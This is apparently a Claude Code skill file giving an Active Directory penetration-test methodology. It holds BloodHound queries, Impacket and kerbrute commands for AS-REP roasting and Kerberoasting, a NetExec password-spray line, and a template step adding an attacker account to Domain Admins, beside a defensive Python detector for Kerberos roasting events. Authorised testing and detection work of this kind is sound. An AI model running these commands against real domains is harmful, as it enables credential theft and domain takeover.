---
name: pentest-ad
description: Active Directory pentest methodology — BloodHound graph analysis, Kerberos abuse, ACL exploitation, lateral movement path advisory. Triggers on Active Directory, AD pentest, BloodHound, Kerberoasting, AS-REP, DCSync, Golden Ticket, Silver Ticket, NTLM relay, lateral movement, Impacket, NetExec, Certipy.
license: MIT
compatibility: Works with Claude Code
allowed-tools: Read Write Edit Bash Grep
metadata:
  author: badi
  badi-version: ">=1.24.0"
  category: pentest
  scope: advisory
  inspired-by: 0xSteph/pentest-ai-agents ad-attacker (advisory tarafi)
---

# pentest-ad

Internal pentest Active Directory advisory: BloodHound graph analysis, Kerberos vulnerability classes, ACL abuse, lateral movement paths. Live commands are composed only after scope has been declared.

## Triggers

- "AD pentest"
- "BloodHound graph analysis"
- "I found a Kerberoast hash"
- "Can I DCSync"
- "lateral movement plan"
- "Golden Ticket"
- "NTLM relay"
- "AD CS abuse"

## Methodology Flow

```
1. Enum: SMB, LDAP, DNS, GPP (passive first)
2. Cred: kerbrute users -> AS-REP roasting (no preauth) -> hashcat
3. Foothold: low-priv shell (phish/web/initial)
4. Recon: BloodHound -> high-value path
5. Privesc: ACL abuse, Kerberos delegation, GPO modify
6. Lateral: PtH, PtT, NTLM relay, WinRM, RDP
7. DA: DCSync (Replicating Changes), Golden Ticket (offline)
8. Persistence: Skeleton key, AdminSDHolder (TIER 2, scope mandatory)
```

## BloodHound Graph Analysis

If the user provides a BloodHound JSON export, the skill runs the following Cypher queries:

```cypher
// Shortest path to Domain Admin from owned user
MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"}))
RETURN p LIMIT 5

// Kerberoastable users with priv access
MATCH (u:User {hasspn:true})-[:MemberOf|AdminTo*1..]->(c:Computer)
WHERE u.enabled=true
RETURN u.name, c.name

// AS-REP roastable
MATCH (u:User {dontreqpreauth:true, enabled:true})
RETURN u.name, u.serviceprincipalnames

// Unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true})
RETURN c.name, c.distinguishedname

// GPO modification risk
MATCH (g:GPO)<-[:GenericAll|GenericWrite|WriteOwner|WriteDacl]-(u)
RETURN g.name, u.name
```

## Common AD Vulnerability Classes

| Vulnerability | Detection | Impact |
|---------------|-----------|--------|
| AS-REP roast | `DONT_REQUIRE_PREAUTH` flag | Offline crackable hash |
| Kerberoast | User SPN + RC4 ticket | TGS hash crack -> service account |
| Unconstrained delegation | Computer object flag | Compromise via DC printer bug |
| NTLM relay | SMB signing off, web auth | Account takeover via relay |
| ACL abuse | GenericAll, WriteDacl | Reset password, add to group |
| ADCS ESC1-ESC8 | Vulnerable cert template | Domain admin via cert |
| LAPS read | ReadProperty ms-Mcs-AdmPwd | Local admin password leak |
| GPO modify | WriteProperty on GPO link | Mass policy compromise |
| Constrained delegation | Service can impersonate | DA via service abuse |
| MSSQL trustworthy | xp_cmdshell + sysadmin | SQL -> OS command |

## Suggested Commands (Scope Required)

```bash
# QUIET — anonymous LDAP enum
ldapsearch -x -H ldap://<dc-ip> -b "DC=domain,DC=local" -s sub

# MODERATE — Kerberos user enum (no auth needed)
kerbrute userenum --dc <dc-ip> -d domain.local users.txt

# MODERATE — AS-REP roast (no creds)
GetNPUsers.py domain.local/ -no-pass -usersfile users.txt -dc-ip <dc-ip>

# MODERATE — Kerberoast (with creds)
GetUserSPNs.py domain.local/user:password -dc-ip <dc-ip> -request

# MODERATE — BloodHound collection
bloodhound-python -u user -p password -d domain.local -ns <dc-ip> -c All

# LOUD — NetExec spray (single password, all users)
nxc smb <range> -u users.txt -p 'Spring2026!' --continue-on-success
```

## OPSEC Notes

- AS-REP roast: domain controller event 4768 (Kerberos pre-auth failure) — this IS detected
- Kerberoast: TGS-REQ event 4769 + service ticket encryption type 0x17 (RC4) — an anomaly
- BloodHound: massive LDAP query traffic with the default collection. Slow it down: `--throttle 30`
- NetExec spray: one password against all users triggers the account lockout policy (3 failures -> 30 min lockout is common)
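The detection side of the 4768/4769 signals above, as an added example that is not part of this skill: it runs over constructed sample DC events (the dict layout and field names are assumptions modelled on the Security log) and flags an RC4 service-ticket burst (Kerberoast) and a no-pre-auth RC4 TGT request (AS-REP roast).

```python
from collections import defaultdict

# Constructed sample DC telemetry (not real logs); the dict layout is an
# assumption, field names mirror the Security log's 4768/4769 events.
SAMPLE_EVENTS = [
    {"id": 4769, "account": "j.doe@CORP.LOCAL", "service": "mssql-svc", "etype": "0x17", "ts": 1000},
    {"id": 4769, "account": "j.doe@CORP.LOCAL", "service": "http-svc", "etype": "0x17", "ts": 1010},
    {"id": 4769, "account": "j.doe@CORP.LOCAL", "service": "backup-svc", "etype": "0x17", "ts": 1020},
    {"id": 4769, "account": "j.doe@CORP.LOCAL", "service": "cifs-fs01", "etype": "0x17", "ts": 1025},
    {"id": 4769, "account": "a.smith@CORP.LOCAL", "service": "cifs-fs01", "etype": "0x12", "ts": 1030},
    {"id": 4768, "account": "svc-legacy@CORP.LOCAL", "preauth_type": 0, "etype": "0x17", "ts": 1040},
    {"id": 4768, "account": "a.smith@CORP.LOCAL", "preauth_type": 2, "etype": "0x12", "ts": 1050},
]


def kerberoast_candidates(events, window=60, min_services=3):
    """Accounts that pulled >= min_services distinct RC4 (0x17) service
    tickets within `window` seconds: the 4769 anomaly from the OPSEC notes.
    A single RC4 TGS-REQ is normal for a legacy service; the burst is not."""
    by_account = defaultdict(list)
    for e in events:
        if e["id"] == 4769 and e["etype"] == "0x17":
            by_account[e["account"]].append((e["ts"], e["service"]))
    flagged = set()
    for account, reqs in by_account.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            # distinct services requested in the window starting at t0
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                flagged.add(account)
                break
    return sorted(flagged)


def asrep_roast_candidates(events):
    """4768 TGT requests with Pre-Authentication Type 0 (no pre-auth) and an
    RC4 ticket: the trace AS-REP roasting leaves on the domain controller."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4768 and e.get("preauth_type") == 0
                   and e["etype"] == "0x17"})


if __name__ == "__main__":
    print("kerberoast:", kerberoast_candidates(SAMPLE_EVENTS))    # ['j.doe@CORP.LOCAL']
    print("as-rep roast:", asrep_roast_candidates(SAMPLE_EVENTS))  # ['svc-legacy@CORP.LOCAL']
```

Tune `window` and `min_services` to the baseline of RC4 service tickets your environment legitimately issues before turning this into an alert.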

## Finding Output Template

```markdown
## AD Compromise Path — <domain>

### Owned Path
1. anonymous SMB shares -> found credentials.txt
2. cred: backup-svc / Backup2024!
3. backup-svc is Kerberoastable -> hash cracked in 4 minutes
4. backup-svc -> member of ServerAdmins group
5. ServerAdmins -> WriteDacl on Domain Admins
6. Single command: net group "Domain Admins" attacker /add -> DA

### Detection Gap (Defensive Output)
- Anonymous SMB share access NOT logged
- ServerAdmins WriteDacl change NOT detected (no Event 5136 alert)
- Suggested Sigma rule: under pentest-detection
```

## Out-of-Scope

- Running live exploits (the GenericAll abuse Bash composer only with declared scope)
- Persistent backdoors (such as Skeleton Key) — stay outside the engagement
- Physical attacks on the DC
